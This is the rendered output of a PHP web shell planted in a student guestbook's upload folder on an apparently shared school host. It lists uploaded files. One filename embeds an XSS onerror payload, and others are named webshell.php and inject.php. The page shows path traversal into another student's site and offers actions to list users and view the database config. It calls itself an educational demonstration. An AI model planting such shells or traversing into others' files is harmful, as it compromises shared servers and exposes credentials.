🐚 WEB SHELL ACTIVATED

📁 File Browser

Current directory: /home/klas4s23/domains/585455.klas4s23.mid-ica.nl/public_html/Gastenboek/uploads

📄 ' onerror='alert(`Gehacked door Jasper!`);window.location.replace(`..`)'.png [view]
📁 ..
📄 003b15869ae62d2ceeee451a5f652dd6.png [view]
📄 0tk5j14v024b1.jpg [view]
📄 300px-Cursed_Cat.jpg [view]
📄 32640-afbeelding-1__ScaleMaxWidthWzYwMF0_CompressedW10.jpg [view]
📄 Bill-Gates-Paul-Allen-2013.jpg [view]
📄 CV Jasper Kramp.png [view]
📄 Cat profile.png [view]
📄 Fronalpstock_big.jpg [view]
📄 Krik en las.jpg [view]
📄 Krik.jpg [view]
📄 Pino-dood-03.jpg [view]
📄 Shellz.php [view]
📄 Ted_Kaczynski_2_(cropped).jpg [view]
📄 Tux.svg.png [view]
📄 Z.png [view]
📄 android.jpg [view]
📄 apple.php [view]
📄 cianancatfish.jpg [view]
📄 downloads (1).jpeg [view]
📄 downloads.jpeg [view]
📄 epresso.jpg [view]
📄 fake_photo.png [view]
📄 hand.jpg [view]
📄 https___dynaimage.cdn.cnn.com_cnn_x_156,y_210,w_1209,h_1612,c_crop_https2F2F5bae1c384db3d70020c01c40%2FfireflyWolfy.jpg [view]
📄 image.png [view]
📄 images.jpeg [view]
📄 info.php [view]
📄 inject.php [view]
📄 instant_redirect.jpg [view]
📄 japper.jpg [view]
📄 koekiemonster-3.jpg [view]
📄 logo.png [view]
📄 muis.jpg [view]
📄 people-call-woman-ugly-responds-with-more-selfies-melissa-blake-1-5d75f249a418b__700.jpg [view]
📄 picobellobv.jpeg [view]
📄 redirect.php [view]
📄 rupsje-nooitgenoeg-knuffel-pluche-42-cm-500x500.jpg [view]
📄 sdfsa.png [view]
📄 sneaky.svg [view]
📄 taylor.webp [view]
📄 test.html [view]
📄 testpreg.php [view]
📄 testpreg1.php [view]
📄 testtest.php.JPG [view]
📄 ultimate_attack.gif [view]
📄 ultimate_attack.php [view]
📄 ultimate_attack.svg [view]
📄 wallpaper.jpg [view]
📄 webshell.php [view]

📄 Viewing: ./../../../../585589.klas4s23.mid-ica.nl/public_html/technowire/style.css

body {
    margin: 0;
    padding: 0;
    font-family: "Agency FB", sans-serif;
    font-size: 14pt;
    background-image: url(https://wallpaperaccess.com/full/3211465.jpg);
}

.container {
    max-width: 960px;
    display: grid;
    grid-template-columns: 1fr;
    grid-template-areas:
        "header"
        "sidebar"
        "main"
        "footer";
    margin: 0 auto;
    box-shadow: none;
}

header {
    background-color: darkslateblue;
    color:black;
    text-align: center;
    padding: 10px 0;
    grid-area: header;
    height: fit-content;
}

footer {
    grid-area: footer;
    padding: 10px;
    background-color: #00DAFF;
    color: black;
}

.main-content {
    grid-area: main;
    padding: 20px;
    background-color: #00BBFF;
    border-left: 1px solid lightgrey;
    border-right: 1px solid lightgrey;
    color: black;
}

/* Stijlen voor de hamburgerknop */
.hamburger-btn {
    background: transparent;
    border: none;
    cursor: pointer;
    padding: 10px;
    z-index: 2;
    display: block;
    margin: auto;
}

/* Stijlen voor het hamburgerpictogram */
.hamburger-btn i {
    font-size: 24px;
    color: #fff;
}

/* Stijlen voor het menu dat aan en uit schakelt */
nav.active {
    display: block !important;
}

nav {
    background-color: #00DAFF;
    color: black;
    padding: 10px;
    position: sticky;
    top: 0;
    right: -250px;
    display: none;
    z-index: 1;
    grid-area: sidebar;
}

nav a {
    color: black;
    text-decoration: none;
    display: block;
    margin-bottom: 10px;
}

nav a:hover {
    text-decoration: underline;
}

.timeline {
    list-style: none;
    padding: 0;
    display: flex;
    flex-direction: column;
    align-items: left;
    
}

.tijdstip {
    list-style: disc;
    margin-left: 1.3em;
    
}

.line {
    border-left: 1px solid black;
    position: absolute;
    height: 240%;
    margin-left: 10px;
}
.linesilvalley {
    border-left: 1px solid black;
    position: absolute;
    height: 380%;
    margin-left: 10px;
}

.timeline-item {
    margin-bottom: 20px;
    width: 75%;
    margin-left:50px;
    
}

.timeline-logo {
    width: 50px;
    height: 50px;
    margin-right: 10px;
    vertical-align: middle;
}

.hall-of-fame {
    list-style: none;
    padding: 0;
}

.hall-of-fame-item {
    margin-bottom: 40px;
    display: flex;
    align-items: center;
    justify-content: space-between;
}

.hall-of-fame-image {
    width: 100px;
    height: 100px;
    border-radius: 50%;
    margin-right: 20px;
}

header img{
    max-width: 350px;
    width: 90%;
}

@media (min-width: 980px) {
    .container {
        margin: 10px auto 10px auto;
        box-shadow: -5px 0px 5px rgba(0, 0, 0, 0.2), 5px 0px 5px rgba(0, 0, 0, 0.2);
    }
}

/* mobile responsive zaken */
@media (min-width: 768px) {
    .container {
        grid-template-columns: 1fr 250px;
        grid-template-areas:
            "header header"
            "main sidebar"
            "footer footer";
    }

    nav {
        display: block;
    }

    .hamburger-btn {
        display: none;
    }

    .main-content {
        border-right: none;
    }
}

.h3 { 
    font-size: 14pt;
    
}

🎯 Available Actions

Command Execution:

Quick Commands:

📋 List files | 👤 Show user | 📍 Show directory | 🔄 Show processes | 🔐 Show users

File Operations:

⬆️ Parent directory | 🏠 Root directory | 🔍 View DB config
⚠️ Educational Warning: This demonstrates a web shell vulnerability. In a real attack, this could allow complete server compromise!